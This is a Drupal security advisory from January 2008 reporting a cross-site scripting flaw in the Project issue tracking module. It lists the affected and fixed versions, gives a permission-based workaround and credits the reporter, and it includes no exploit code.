- Advisory ID: DRUPAL-SA-2008-012
- Project: Project issue tracking (third-party module)
- Version: 4.7.x-1.x, 4.7.x-2.x, 5.x-1.x, 5.x-2.x
- Date: 2008-January-30
- Security risk: Moderately critical
- Exploitable from: Remote
- Vulnerability: Cross-site scripting (XSS)
Description
The Project issue tracking module provides a summary table to show changes in issue states between comments. Users who have certain editing rights may be able to inject arbitrary code on pages containing these tables.
Wikipedia has more information about cross site scripting (XSS).
Versions affected
Project issue tracking (project_issue) versions:
- 5.x-2.x-dev from before 2008-01-30
- 5.x-1.2 and earlier
- 4.7.x-2.6 and earlier
- 4.7.x-1.6 and earlier
Drupal core is not affected. If you do not use the contributed Project issue tracking module, there is nothing you need to do.
Solution
Install the latest version:
- Project issue tracking 5.x-2.0
- Project issue tracking 5.x-1.3
- Project issue tracking 4.7.x-2.7
- Project issue tracking 4.7.x-1.7
As a temporary workaround, sites can disable the 'maintain projects' and 'administer projects' permissions for all users.
See also the Project issue tracking project page.
Reported by
Chad Phillips of the Drupal Security Team.
Contact
The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.